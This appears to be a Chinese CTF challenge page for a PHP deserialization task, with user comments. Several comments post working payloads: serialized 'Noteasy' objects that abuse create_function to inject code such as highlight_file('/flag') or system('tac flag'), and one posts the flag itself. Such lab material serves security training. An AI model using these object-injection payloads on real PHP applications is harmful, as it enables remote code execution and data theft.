unserialize-NoteasyWEB 未解决

分数: 30 金币: 3
题目作者: 云牧青
一  血: Lazzaro
一血奖励: 5金币
解  决: 721
提  示:
描  述:
不简单的反序列化
...
登录回复
评论
ixin 4月前
举报

真心不会等在提升一段时间再来做

回复 0
对对对对对对对对 4月前
举报

看评论区师傅们博客内对于create_function的理解,另外还有序列化的格式语法

回复 0
gxrtbtc 8月前
举报

序列化字符串中%3B%7D%3B部分导致结构断裂(未闭合的花括号和分号)1013 私有属性命名未正确处理空字符\0(应为\0类名\0属性名格式)13 功能失效 create_function构造的函数体;}highlight_file("/flag");/*存在语法错误: ;}会提前结束函数定义 /*未正确注释后续代码21

回复 0
locust 1年前
举报

O%3A7%3A%22Noteasy%22%3A2%3A%7Bs%3A10%3A%22%00Noteasy%00a%22%3Bs%3A15%3A%22create_function%22%3Bs%3A10%3A%22%00Noteasy%00b%22%3Bs%3A29%3A%22%3B%7D%3Bhighlight_file%28%22%2Fflag%22%29%3B%2F%2A%22%3B%7D

回复 6
Jiafeng 1年前
举报

flag{d45ca0bf896cdf6a9903d5030554214e} ; 这里主要是考察反序列化的使用,这里给出一个连接,学会使用create_function函数来进行反序列化的操作; https://blog.csdn.net/weixin_61785633/article/details/131159553

回复 0
雾島风起時 1年前
举报

真心不会等在提升一段时间再来做

回复 1
小猫猫嗷嗷叫 1年前
举报

p=O:7:"Noteasy":2:{s:10:"%00Noteasy%00a";s:15:"create_function";s:10:"%00Noteasy%00b";s:24:";}system("tac%20flag");/*;";}

回复 0
xiaoxiao972521 2年前
举报

一看评论都寄了,我就不开场景了,啊哈哈哈哈

回复 0
XRain 2年前
举报

这种题不会真没办法,相当于当场挖出 create_function 的漏洞,挺难的,只能靠平时看文章和关注安全动态,记下各种技巧。

回复 0
Youmos 2年前
举报

寄了,不会

回复 0

WriteUp

image
云牧青

5 金币

立即查看

评分(2)

解题动态

kitniu 攻破了该题 15小时前
kr2yh 攻破了该题 7天前
afeer123 攻破了该题 11天前
cchyde 攻破了该题 11天前
银海狼鲨 攻破了该题 12天前
trapping 攻破了该题 13天前
66666ctfxr 攻破了该题 14天前
Zhengzanmei 攻破了该题 14天前
hyj11125 攻破了该题 17天前
lee8ly 攻破了该题 17天前
SamJij 攻破了该题 18天前
沧颜 攻破了该题 22天前
2234223561 攻破了该题 22天前
小马哥 攻破了该题 22天前
十里故清云 攻破了该题 23天前
wasdwq 攻破了该题 25天前
jerryxucy 攻破了该题 28天前
itheima 攻破了该题 28天前
xenos 攻破了该题 28天前
17586557508 攻破了该题 28天前
问题反馈